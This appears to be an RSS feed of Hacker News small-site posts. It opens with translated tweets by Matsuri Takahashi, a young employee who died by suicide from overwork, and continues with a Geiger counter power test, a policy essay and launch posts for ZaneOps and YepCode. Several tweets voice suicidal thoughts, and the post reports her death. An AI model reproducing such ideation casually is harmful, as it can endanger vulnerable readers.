    "You've worked hard for six months, now you don't have to work anymore" — I wish some rich 50-year-old divorced man who thinks like that (balding is fine) would propose to me so I could become a housewife and live like a pet. Even though I graduated from Tokyo University.

    Tweeted at

    10:08 PM, October 6 (Tuesday)

    Are there any new employees who don't get mentally ill? I can't tell...

    Tweeted at

    11:30 PM, October 7 (Wednesday)

    I want to meet at a small bistro around Higashi-Ginza around 9 PM, drink well-chilled white wine while complaining "Work is tough—I hate it," and have a kind, smart boyfriend who nods and says "I know" while giving advice and a bit of scolding, but also says "Worst case, it's okay to quit." Since I have no other goal than to be proposed to by such a person, I have nothing to tell the department head during my evaluation interview.

    Tweeted at

    11:31 PM, October 7 (Wednesday)

    It's still only Wednesday?

    Tweeted at

    11:20 PM, October 12 (Monday)

    Came to work on a holiday thinking I was being diligent, but 60% of our department was already there. No wonder people die from overwork.

    Tweeted at

    1:28 AM, October 13 (Tuesday)

    I'm going to take a bath now and then head to the office ( ・ᴗ・̥̥̥ ) death

    Tweeted at

    12:03 AM, October 15 (Thursday)

    When everyone else is leaving at 4 AM or pulling all-nighters, there's an atmosphere where new employees can't say they're sleepy or tired. I'll be the type who feels guilty about escaping even during a fire or earthquake, and will die clinging to my PC until the end.

    Tweeted at

    3:28 AM, October 20 (Tuesday)

    Cause of death: "tough love" from the boss

    Tweeted at

    3:41 AM, October 21 (Wednesday)

    Made it home...

    Tweeted at

    5:24 PM, October 21 (Wednesday)

    State of emergency #1 has been declared, registered on a job search site.

    Tweeted at

    11:21 PM, October 22 (Thursday)

    Recently I've been working 19 hours straight, lunch is either at my desk from a convenience store or I skip it altogether ( ´- ̥̥̥ω- ̥̥̥` )

    Tweeted at

    11:26 PM, October 22 (Thursday)

    I'm tired of only talking to people from work every day...

    Tweeted at

    4:36 PM, October 25 (Sunday)

    Even with the worst feelings after breaking up with my boyfriend, it's comforting to know that endless work awaits me at the office.

    Good thing I have such a tough job.

    Tweeted at

    8:56 PM, October 28 (Wednesday)

    I was told the document I made over two consecutive all-nighters was completely useless, but then he said if I fix it we might take it to the client, and now I'm motivated enough to work on weekends. I have an abundance of corporate slave talent.

    Tweeted at

    12:00 AM, October 29 (Thursday)

Thanks to overtime pay, my 7th month salary is 1.5 times my starting salary! 🎊 Overwhelming growth 🙌😊💕

    Tweeted at

    9:48 PM, October 29 (Thursday)

    I broke the village-like company rule that "the seniority wall is deeper than the ocean" by speaking too casually to a slightly senior colleague and incurred their anger, damaging my mental state again.

    Tweeted at

    7:58 AM, October 31 (Saturday)

    Department head: "Your 20 hours of overtime is a waste for the company," "Looking sleepy during meetings shows you can't manage yourself," "Don't come to work with messy hair and bloodshot eyes," "If you're struggling with the current workload, your capacity is too small."

    Me: "Bloodshot eyes aren't allowed either?"

    Tweeted at

    10:53 PM, October 31 (Saturday)

    I mean, even first-class professionals can't control their blood vessel constriction.

    Tweeted at

    3:23 PM, November 1 (Sunday)

    I don't want to go to work. I wish we had two-day weekends (><)

    Tweeted at

    8:22 PM, November 3 (Tuesday)

    When you can't tell if you're working to live or living to work, that's when real life begins.

    Tweeted at

    11:59 PM, November 5 (Thursday)

    I'm even using Twitter to collect evidence for when I sue the company after quitting.

    Tweeted at

    11:58 PM, November 12 (Thursday)

    I thought I could keep going, but I broke down unexpectedly early and now I hate myself.

    Tweeted at

    12:34 AM, November 13 (Friday)

    Miraculous return to society. Phew

    Tweeted at

    1:12 AM, November 15 (Sunday)

    What I want to tell job-hunting students is that work is not like fun activities or part-time jobs—it's "labor" that continues for life, and if it doesn't suit you, your mental and physical strength may wear down every day.

    Tweeted at

    8:32 AM, November 18 (Wednesday)

    I absolutely hate waking up in the morning.

    Tweeted at

    7:20 AM, November 20 (Friday)

    I managed to wake up again today...
    The difficulty level will increase even more with the new season.

    Tweeted at

    7:21 AM, December 3 (Thursday)

    It's not that I don't want to work, I just don't want to wake up in the morning.

    Tweeted at

    8:42 PM, December 8 (Tuesday)

    Shit! Hey, I'm heading to the office like a salmon swimming upstream to spawn!

    Tweeted at

    4:06 AM, December 9 (Wednesday)

    I'm heading home now, but no matter how I calculate it, there's not enough time?

    When I have to do things I'm not good at, I become way too inefficient...

    Tweeted at

    5:39 AM, December 11 (Friday)

    Heading home now (T ^ T)

    Tweeted at

    3:10 PM, December 12 (Saturday)

    Since all my cohort is coming to work on Saturday, I can go to work happily!

    Tweeted at

    12:40 AM, December 14 (Monday)

    I hope I can get married and quit my job as soon as possible.

    Tweeted at

    11:18 PM, December 15 (Tuesday)

    A "good job" from my favorite senior - priceless

    Tweeted at

    9:41 PM, December 16 (Wednesday)

    Getting to leave before 10 PM... it's a miracle

    Tweeted at

    9:48 PM, December 16 (Wednesday)

    I wonder what will remain after overcoming such stressful days while constantly wanting to die.

    Tweeted at

    12:04 AM, December 17 (Thursday)

    My eyes are dying, my heart is dying, and I even thought I might be better off dead, so today I was considering who would be the best lineup to CC on my suicide note email.

    Tweeted at

    7:37 PM, December 17 (Thursday)

    Senior~! Please stop praising me properly when I do well and gently scolding me when I mess up~(><) Stop becoming my only ray of hope in these painful days~(><) At this rate I might fall for you~(><)

    Tweeted at

    4:01 AM, December 18 (Friday)

    When you're at the company for 20 hours a day, you start to lose track of what you're even living for and just laugh.

    Tweeted at

    3:55 PM, December 20 (Sunday)

    Even though I finally get to see my boyfriend after 4 months, it's incredibly stressful having to finish work super quickly for that and feeling pressured not to complain. Being a working adult means never being able to let your guard down for a moment.

    Tweeted at

    5:54 PM, December 20 (Sunday)

    Being told by male bosses that I lack femininity or whatever, even if it's meant as a joke to get laughs, is my limit of patience. It's unfair that men don't get told they lack masculinity when they go bald. So depressing.

    On the morning of Christmas Day, 2015, Matsuri Takahashi threw herself from her company dormitory and died at the age of 24. She had been working for 9 months, doing an estimated 130 monthly hours of overtime.

    According to her mother, Matsuri was well aware that excessive work could lead to death, but she still couldn't quit her job.

(I started this post with the intention of making a point about something, but rereading this story broke my heart all over again and it's difficult to pick up from here. I think it's enough for today.) ●

    Note: Matsuri Takahashi's Twitter account in Japanese can be found here.

    Cover image:

    Photo by Ian Keefe, Unsplash

    ]]>
    https://aethermug.com/posts/matsuri-s-grown-up-world hacker-news-small-sites-43193980 Thu, 27 Feb 2025 12:59:00 GMT
    <![CDATA[Testing of energy consumption by Geiger counter GGreg20_V3]]> thread link) | @iotdevicesdev
    February 27, 2025 | https://iot-devices.com.ua/en/ggreg20_v3-geiger-counter-energy-consumption-testing/ | archive.org

Our company has conducted thorough testing of the power consumption of the Geiger counter module GGreg20_V3, intended for use in DIY projects. The purpose of the study was to determine the module’s real power consumption at different supply voltages: 3.3V, 3.7V, and 5.0V.

    GGreg20_V3 Energy Consumption Testing

    To conduct the measurements, we developed a special test bench based on the Home Assistant platform. The central element of the system was the Raspberry Pi Pico W controller with ESPHome firmware, which controlled the operation of the GGreg20_V3 module. To accurately measure the energy consumption, we used an INA219 sensor connected to a NodeMCU/ESP8266 controller also running ESPHome firmware. We used a laboratory power supply as a power source for the GGreg20_V3, which set the exact voltage level during testing.

Since the GGreg20_V3 module supports a wide range of supply voltages (at least 3.0V to 5.5V), we tested the three most common levels to show how the results differ: 3.3V, 3.7V, and 5.0V. These voltages give us an idea of the module’s consumption when powered by:

    • another controller or source with a voltage of 3.3V;
    • a 3.7V lithium battery;
    • another controller or source with a voltage of 5V.

    It is important to note that the INA219 sensor measured only the power consumption of the GGreg20_V3 module, while the controllers were powered separately. This allowed us to obtain the most accurate data.

Also note that the supply voltage level did not change over time during the 60-minute test. So you should not expect a complete emulation of, for example, a lithium battery that discharges under load and accordingly drops from 4.2V to 2.5V over the course of the test. Although that would have been a really useful and interesting experiment, we decided not to go that far.

GGreg20_v3 energy consumption test lab structure (2025-02-25)

Component | Purpose | Power supply | Firmware / Interface
GGreg20_V3 | Object of the energy consumption study; measures the radiation level | Via INA219 from the laboratory power supply | – / GPIO output, Active-Low
Raspberry Pi Pico W | Receives data from the GGreg20_V3 module and transfers it to the Home Assistant server | USB | ESPHome configured with GGreg20_V3 as a sensor / WiFi wireless connection
INA219 | Measures the current consumed by the GGreg20_V3 module | From the laboratory power supply unit | – / I2C
NodeMCU ESP8266 (or ESP12_OLED) | Controls the INA219 module, receives measurement data, and transmits it to the Home Assistant server | USB | ESPHome configured with INA219 as a sensor / WiFi wireless connection
Lab power supply unit | Supplies the INA219 and GGreg20_V3 sensor modules with the set voltage | 220V power mains | DC output: 3.3V, 3.7V, 5.0V
Home Assistant server | Enables data transfer between devices via WiFi; collects, processes, and visualizes measurement data | 220V power mains | Wireless WiFi connection
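
For reference, the Pico W side of the bench boils down to an ESPHome pulse_counter sensor along these lines; the GPIO pin here is a placeholder rather than our exact wiring:

sensor:
  - platform: pulse_counter
    pin:
      number: GPIO16          # placeholder: the pin wired to the GGreg20_V3 output
      inverted: true          # the module's pulse output is Active-Low
      mode: INPUT_PULLUP
    name: "GGreg20_V3 CPM"
    unit_of_measurement: "CPM"
    count_mode:
      rising_edge: DISABLE
      falling_edge: INCREMENT
    update_interval: 60s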

Software for the energy-consumption measurement side, based on an ESP8266 + INA219 with ESPHome firmware:

    sensor:
      - platform: ina219
        address: 0x40
        shunt_resistance: 0.1 ohm
    
        current:
          name: "INA219 Current"
          accuracy_decimals: 5
          id: current_value
    
        power:
          name: "INA219 Power"
          accuracy_decimals: 5
          id: power_value
    
        bus_voltage:
          name: "INA219 Bus Voltage"
          accuracy_decimals: 5
    
        shunt_voltage:
          name: "INA219 Shunt Voltage"
          accuracy_decimals: 5
    
        max_voltage: 32.0V
        max_current: 3.2A
        update_interval: 1min
    
      - platform: integration
        name: "Total Energy Consumed"
        id: total_energy
        sensor: power_value
        time_unit: min
        accuracy_decimals: 5
        unit_of_measurement: "Wh"
        filters:
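      # integration yields W·min; multiply by 1/60 to convert to Wh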
          - multiply: 0.0166666666666667
    
      - platform: integration
        name: "Total Current Consumed"
        id: total_current
        sensor: current_value
        time_unit: min
        accuracy_decimals: 5
        unit_of_measurement: "Ah"
        filters:
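      # integration yields A·min; multiply by 1/60 to convert to Ah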
          - multiply: 0.0166666666666667
    

This YAML configuration snippet provides all the data needed for our planned testing of the GGreg20_V3 radiation sensor module’s power consumption under normal background radiation conditions.

The power consumption was measured every minute, with data accumulated over the course of the test. Each test lasted an hour, giving us the real consumption of the GGreg20_V3 module over 60 minutes for each of the three supply voltages.

    The Home Assistant platform was used to collect and record sensor data. It also provided tools for creating visual graphs of electricity consumption.

    Thanks to the testing, we have obtained detailed data on the power consumption of the GGreg20_V3 module at different supply voltages. These results allow users to optimize the power consumption of their DIY projects using this module.

    Power supply with a voltage of 3.3V

    ggreg20_v3_at_3V3_energy_consumption_test_1hour_with_buzzer_2023-08-29
    ggreg20_v3_at_3V3_energy_consumption_test_1hour_with_buzzer_graph_2023-08-29

    Power supply with a voltage of 3.7V

    ggreg20_v3_at_3_7V_energy_consumption_test_1hour_with_buzzer_2023-08-30
    ggreg20_v3_at_3_7V_energy_consumption_test_1hour_with_buzzer_graph_2023-08-30

    Power supply with a voltage of 5.0V

    ggreg20_v3_at_5V_energy_consumption_test_1hour_with_buzzer_2023-08-31
    ggreg20_v3_at_5V_energy_consumption_test_1hour_with_buzzer_graph_2023-08-31

    Summary of results

The power consumption of the GGreg20_V3 module was measured for 60 minutes at each voltage under normal conditions. INA219 measurement update cycle: 1 minute.

Parameter | 5 Volts | 3.7 Volts | 3.3 Volts
Output voltage of the laboratory PSU, V | 5.11 | 3.83 | 3.45
Supply voltage of the GGreg20_V3 (at the INA219 sensor), V | 5.01 | 3.7 | 3.32
Charge consumed during the test (LED blinking, buzzer beeping), A·h | 0.03523 | 0.05174 | 0.05741
Instantaneous current at rest, A | 0.0343 | 0.04880 | 0.05664
Peak bursts of instantaneous current (blink & beep, duration 10 ms), A | 0.051 | 0.064 | 0.093

    Test dates: 27.08. – 31.08.2023

    No deviations in radiation level measurements were observed during testing

    Testing was performed in the default settings of the GGreg20_V3 module. The buzzer is enabled. The Schottky protection diode is installed. Blue power supply LED lights constantly. The supply voltage remained unchanged throughout the test cycle.

    Appendix. Theoretical battery discharge diagram

    We also decided to show the theoretical discharge graph at three different voltages when the GGreg20_V3 module is powered by batteries of different chemistry and capacity.

    The basis for our calculations was the battery characteristics available on the Internet:

Battery voltage level | Battery assembly | Example of a rechargeable battery
3.2V | 1 × | Soshine 18650 1800 mAh LiFePO4 3.2V
3.7V | 1 × | Sony 18650 VTC6 3.7V 3120 mAh (30A)
4.8V | 4 × in series | Videx NiMH AA HR6 1.2V 2100 mAh

    However, please note once again that this graph is a theoretical assumption and does not take into account the discharge of real batteries under load over time and changes in voltage and current consumption during discharge.

    Estimated battery lifetime under normal background conditions (20-40 CPM) with alarming

    The Geiger counter module GGreg20_V3 manufactured by IoT-devices, LLC is the company’s flagship product, which has found its users in more than 30 countries.

    All over the world, radio amateurs use GGreg20_V3 to create their own DIY projects, learn and conduct experiments related to radiation measurement.

    When developing this product and improving it since 2020, we tried to make the module compact, ready-to-use, compatible with as many DIY platforms and systems as possible, undemanding in terms of power supply voltages, easy to program, and harmonized in terms of operating characteristics with various Geiger tubes.

    We have also developed a number of examples and posted them on GitHub for various hardware and software platforms such as Arduino UNO, ESP32, ESP8266, Raspberry Pi Pico W, NodeMCU, ESPHome, Tasmota, MicroPython, Home Assistant.

    And we, at IoT-devices Company, hope that our Customers will have a great user experience and real pleasure by implementing this module in their projects.

    We also thank everyone for supporting and choosing this product designed and manufactured in Ukraine. We really appreciate it!

    Geiger counter

    GGreg20_V3

    Testing of energy consumption

    DIY-projects

    Home Assistant

    Raspberry Pi Pico W

    ESPHome

    INA219

    NodeMCU

    ESP8266

    I2C

    WiFi

    YAML

    ]]>
    https://iot-devices.com.ua/en/ggreg20_v3-geiger-counter-energy-consumption-testing/ hacker-news-small-sites-43193780 Thu, 27 Feb 2025 12:30:59 GMT
    <![CDATA[Thoughts for Inauguration Day]]> thread link) | @maxerickson
    February 27, 2025 | https://www.eatingpolicy.com/p/thoughts-for-inauguration-day | archive.org

    On inauguration day 2017, I wrote this:

    Most importantly, remember, the status quo isn’t worth protecting. It’s so easy to be in reaction, on the defensive, fighting for the world we had yesterday.

    Eight years later, the status quo still isn’t worth protecting. I know that’s quite a blanket statement, and yes, I think things like the independence of the civil service and democracy are worth protecting, and yes, I worry about both. But we have to grapple a lot more honestly with why so many people voted for massive, disruptive change, even potentially at the cost of the core principles and values we are supposed to hold dear. Take, for instance, the rule of law.

    In The New York Times a few weeks ago, Stephen E. Hanson and Jeffrey S. Kopstein characterize the incoming administration’s patrimonialism (rule through personal power and patronage) as “an assault on the modern state as we know it.” Noting that Trump won the presidential election fairly, they correctly assess that reversing this assault “will require more than a simple defense of ‘democracy.’ …The threat we face is different, and perhaps even more critical: a world in which the rule of law has given way entirely to the rule of men.”

    I agree. The rule of men is fundamentally inconsistent with the principles and values of our nation, and I do not welcome any nepotism, graft, or abuse of the system for retribution that may be coming our way. But why would half of voters tolerate this? The authors propose that “a slew of self-aggrandizing leaders has taken advantage of rising inequality, cultural conflicts and changing demography to grab power,” suggesting that the rule of law is a hapless casualty of other circumstances. But the principle of a nation governed by laws not men should have been non-negotiable. It should have been a crown jewel of our democracy for which all else could be tolerated. It wasn’t. The crown jewel was tarnished, and unless we understand the nature of that tarnish, we have little hope of returning that jewel to its rightful place.

    It’s not particularly insightful to point out that if you feel the system is rigged, and the rule of law enforces that rigged system, you are unlikely to defend it. Rising inequality, as the authors suggest, does lead more and more people to conclude just that. There is a strong sense that the elite get away with murder while the poor do time for too many parking tickets.

    But you don’t have to feel that the system is fundamentally rigged against you personally to entertain the possible benefits of “the rule of men,” or perhaps we could just say people. The reality is that people are frustrated with a system in which it feels like laws — a complex, tangled, often contradictory, seemingly arbitrary web of rules that most people don’t understand — dictate outcomes at the expense of reasonable human judgement. Philip Howard provides an endless stream of examples of rules winning out when common sense could have prevailed, like the homeless shelter in New York that couldn’t be built without installing a prohibitively expensive elevator, despite the fact that only the first floor was to be used, or the public school custodian who, despite being perfectly capable of fixing the broken window, instead had to file paperwork to order union labor to do so, leaving the window broken for months while the paperwork made its way through the bureaucracy and a team could be assigned. These aren’t edge cases. They are just the routine results of what Dan Davies calls the unaccountability machine, in his excellent book of the same name. Rule by people would allow for judgement, for just fixing the window. Rule by law leaves the cold air freezing the students while costs spiral.

    When Biden took power back from Trump in 2021, there was enormous relief among lawyers in government. I know of one agency in which the mere statement “we will respect the rule of law,” spoken that first day of the Biden administration, elicited tears from otherwise buttoned-up bureaucrats. It’s entirely understandable, even touching, given the chaos that had ensued at that agency. But what followed during the next four years, across a Democratically-led federal government, was a retreat to the safety of process and procedure. It felt good and right after the lawlessness of the Trump years to luxuriate in its antidote.

    But there is a cost to that refuge. Quinta Jurecic, also writing in the Times, describes the cost to the Department of Justice, whose leadership under Biden vowed to hold Trump accountable for the January 6th assault on the Capitol, and failed to do so, in part because of how slowly it moved. She writes:

    The department did not dawdle quite so much as its fiercest critics argue. Still, if the goal in moving slowly was to turn down the political temperature, this seems in hindsight to have had the opposite effect. In explaining his thinking, [Attorney General Merrick] Garland said that “the best way to ensure the department’s independence, integrity and fair application of our laws” is to have “a set of norms to govern our work.” Protecting the rule of law, it turns out, requires more than maintaining the Justice Department’s own internal processes.…

    After all, for the average person not steeped in Justice Department traditions, the first Trump administration’s model of law enforcement as a system of patronage — with preferential treatment apparently given to allies of the president — might seem appealing when compared with a plodding, opaque, rule-bound bureaucracy that nevertheless reliably manages to advantage those in power.

    Those tears of relief in 2021 have turned to tears of despair in 2025. Process and procedure do not, it turns out, ensure just outcomes.


    The Supreme Court is also not helping the reputation of the law. This SCOTUS is happy to put finicky procedural objections over substance when it serves them. Take Ohio vs EPA, in which the conservative majority (minus Amy Coney Barrett, thankfully) sided with states complaining about a new rule seeking to prevent upwind states from polluting the air of downwind states. Perhaps these justices just don’t want the EPA to be regulating at all, but they didn’t justify their decision on the basis of cost-benefit or anything like that. Notice and comment rule-making requires agencies to respond to comments from the states and industry groups that opposed the rule, in this case more than 1,100 highly technical comments. The EPA did this, but the court decided in the states’ favor because the EPA didn’t address one of the criticisms at the level of detail that the Supreme Court wanted to see.

    In other words, SCOTUS is not saying EPA shouldn't protect downwind states from the pollution of their neighbors. The court is saying that EPA should be more thorough in complying with procedure, even when that procedure is clearly weaponized by industry groups, who, as Nicholas Bagley writes, “carpet-bomb agencies with thousands of pages of comments, many of which contain unstructured technical information.” Nick continues: “The EPA’s sin, if there was one, was failing to adequately respond to a single oblique comment that it received.” Whatever you think about agency regulation — and I believe that agencies certainly do overreach and regulate badly at times — it’s still a bad look for the highest court in the land to put such a technicality over reasonable judgement.

    What this kind of thing tells everyone — on the right and the left, elites and the working class — is that the rule of law is easily twisted by those in power to justify whatever it is they want to do.

    That’s what the law has become for so many people. It’s not a blindfolded Lady Justice demonstrating impartiality and reasonableness, it’s a game of gotcha. I’ve ranted at length before about how public servants trying to deliver on the promises of our laws and policies are thwarted by the weaponization of the complexities of other laws, being told over and over again that the perfectly reasonable things they want to do to perform their jobs are illegal. Hanson and Kopstein believe that Trump represents “an assault on the modern state as we know it,” without acknowledging why the modern state might merit an assault.

    Assaults hurt. I am currently engaged in an assault on my own body, and it is deeply unpleasant. Every three weeks now, I sit in a small room and let a nurse drip harsh chemicals into my bloodstream. The last time I did it, one of the chemicals burned so badly you can see my bruised and hardened vein through the skin. The week following I’m sick as my body tries to rid itself of their toxic effects, hopefully taking whatever cancer cells may have been floating around with them.

    I’m not enjoying this, but the alternative is a highly likely return of cancer. If it returns, it will probably land in my bones, and it will be incurable. Chemo kills fast-growing cells, including healthy white blood cells in the bone marrow. Right now, ten days after a treatment, I’m highly vulnerable to infection. It’s the opposite of health, in the service of health. There are no guarantees, but this assault on my system gives me far better odds of living a normal, healthy life in the long run. Like every cancer patient, I vow to be healthier than ever when this is over. I’m done with alcohol. I’ll never skip another workout. There’s nothing like losing your health to make you treasure it.

    Cancer has been my metaphor before. The unchecked growth of policy, process, and procedure that compounds over time and strangles our government’s ability to act in the public interest is much like a cancer. When I wrote that, I believed my cancer would be excised with surgery and that would be it. Now chemo is my metaphor. It seems we may go through some scary and even dangerous changes. But I believe there is something better on the other side of this for our country, too.

    Here’s more of what I wrote eight years ago:

    Most importantly, remember, the status quo isn’t worth protecting. It’s so easy to be in reaction, on the defensive, fighting for the world we had yesterday. Fight for something better, something we haven’t seen yet, something you have to invent. Find a thousand collaborators. Include people you disagree with. Meet division with imagination.

    Here’s what I have to say today. I believe those last two bits even more than I did then. Our job now is to be changed, to reflect, to become better. We can’t do that without disagreement, without the imagination that comes from engaging across division. When we come out the other side of this, Dems can’t be who we are today. We can’t retreat again into a procedure fetish that serves no one, to start. Hell, the public isn’t putting us back in power if that’s our plan. We must find a new way.

    Discussion about this post

    ]]>
    https://www.eatingpolicy.com/p/thoughts-for-inauguration-day hacker-news-small-sites-43193730 Thu, 27 Feb 2025 12:25:22 GMT
    <![CDATA[Show HN: ZaneOps, a self-hosted alternative to Vercel, Heroku and Render]]> thread link) | @fredkisss
    February 27, 2025 | https://zaneops.dev/changelog/announcing-v1/ | archive.org



    ZaneOps v1.0 is finally here!

    ZaneOps is a beautiful, self-hosted, open-source platform for hosting static sites, web apps, databases, services (like Umami, WordPress, Supabase), workers, or anything else you need—whether you’re launching a startup or managing an enterprise.

    Today, ZaneOps is stable and production-ready.

    Install ZaneOps

Installation steps are detailed on the installation page, but here is the TL;DR:

# create directory to install zaneops
mkdir -p /var/www/zaneops && cd /var/www/zaneops

# download zaneops CLI
curl https://cdn.zaneops.dev/makefile > Makefile

# setup zaneops
make setup

# start zaneops app
make deploy

Why does ZaneOps exist?

The goal of ZaneOps is to bring together the best features we could “steal” (er, take inspiration from) popular platforms like Vercel, Railway, and Render, while giving you full ownership of your data and complete control over your server costs.

    Features

    Deploying Services from Docker Images

    Environment Variables Management

    Supports adding single variables:

    And importing variables from .env files:
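For illustration only, an imported file might look like the following (the variable names and values here are made up, not ZaneOps defaults):

# .env (hypothetical contents)
DATABASE_URL=postgres://app:secret@db:5432/app
SESSION_SECRET=change-me
PORT=8080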

    Advanced URL Management

    Supports wildcard domains:

    Generates default URLs for services:

    Allows multiple services to share the same domain:


    Persistent Logs

    Application logs are persisted per deployment:

    HTTP logs are persisted per deployment and per service:

    Monitoring

    Provides metrics per service and deployment:

    Git-Like Configuration Changes

    Allows you to review changes before deploying:

    Resource Limits

    Magic File Mounts

    Override the content of any file within your services or add new files required for configuration:
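As a purely illustrative example of the kind of file you might mount this way, consider dropping a custom robots.txt into a stock nginx image (the path and contents below are assumptions for the sketch, not ZaneOps defaults):

# /usr/share/nginx/html/robots.txt (example file injected into the container)
User-agent: *
Disallow: /admin/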

    Deployment Webhook URLs

    Easily set up a CI/CD workflow:
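As a sketch of what that can look like, a CI pipeline's final step could simply call the service's webhook (the URL comes from the ZaneOps dashboard; the HTTP method here is an assumption):

# hypothetical final CI step: trigger a redeploy by calling the service's webhook
# ZANEOPS_WEBHOOK_URL is the URL ZaneOps generates for the service, stored as a CI secret
curl -f -X POST "$ZANEOPS_WEBHOOK_URL"

Since the URL effectively acts as a credential, keeping it in the CI platform's secret store rather than in the repository is the safer choice.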

    OK, I Like What I See 😍

    If you’d like to start using ZaneOps today, follow the installation steps.

    You can also check out our tutorial on deploying a React Router SSR app on ZaneOps.

    What’s Next?

    V1.0 is just the beginning! We have exciting features planned, including:

    • Git-based deployments with GitHub integration and pull request preview environments
    • Multi-server support with multiple replicas per service
    • Automated backups for databases and other services

    We’re just getting started, and we’d love for you to join us on this journey.

If you’ve made it this far, we have a small favor to ask: please give us a star on GitHub! ⭐ It’s one of the easiest ways to support the project. You can also help by resharing this post and spreading the word about ZaneOps.

    Thank you! 🫶

    ]]>
    https://zaneops.dev/changelog/announcing-v1/ hacker-news-small-sites-43193639 Thu, 27 Feb 2025 12:14:02 GMT
    <![CDATA[Show HN: YepCode Run – Perfect for Running AI-Generated Code in Secure Sandboxes]]> thread link) | @mmuino
    February 27, 2025 | https://yepcode.io/run | archive.org

    🎯 What is this?

    Built on top of YepCode, it allows you to execute code without any setup or installation. Perfect for:

• 🤖 Execute AI-generated code - Run it securely in a sandboxed environment to support fully autonomous AI agents.

• 📦 Package Exploration - Try npm or PyPI packages without installing them locally.

• 🔄 Code Sharing - Share runnable code examples with others.

• 🧪 Quick Prototyping - Test snippets and algorithms on the fly.

Just write or paste your code, and we'll handle all the setup needed! 🤙

    🤔 Why YepCode Run?

    Running arbitrary code in production environments presents significant challenges around security, scalability, and infrastructure management.

This is especially critical when dealing with AI-generated code from LLMs. We provide enterprise-grade sandboxing and security measures out of the box - allowing you to focus on your code instead of infrastructure concerns.

    📂 Example Templates

    ]]>
    https://yepcode.io/run hacker-news-small-sites-43193542 Thu, 27 Feb 2025 12:00:22 GMT
    <![CDATA[Show HN: No-html.club, a plain text club]]> thread link) | @dominicq
    February 27, 2025 | http://no-html.club/index.txt | archive.org

    Unable to extract article]]>
    http://no-html.club/index.txt hacker-news-small-sites-43193383 Thu, 27 Feb 2025 11:28:56 GMT
    <![CDATA[Service as a Software]]> thread link) | @georgestrakhov
    February 27, 2025 | https://www.uxtigers.com/post/service-as-software | archive.org

Summary: Over the upcoming decade, AI-provisioned intelligence will become almost free and instantly available. AI won’t just assist professionals — it will take over much of the work as a packaged, instant service provider. Welcome to the age of boundless skill scalability, where services transform into software and economies grow beyond human imagination.

    Imagine a world where professional expertise is a few clicks away—faster, smarter, and unbelievably affordable. This isn’t science fiction; it’s the next revolution in SaaS. AI becomes your consultant, designer, and researcher, redefining what’s possible in every corner of work. This will create a new model for service design, where services that used to be provided by humans are packaged up and delivered by software. We can call this “Service as a Software”, reusing the acronym SaaS that has long been used for “Software as a Service.”

    (Watch the jazz music video I made based on this article. YouTube, 2 min.)

    Software as a Service (the original SaaS) is a cloud computing model in which software applications are hosted by providers and delivered to users over the Internet on a subscription basis, eliminating the need for local installation and maintenance.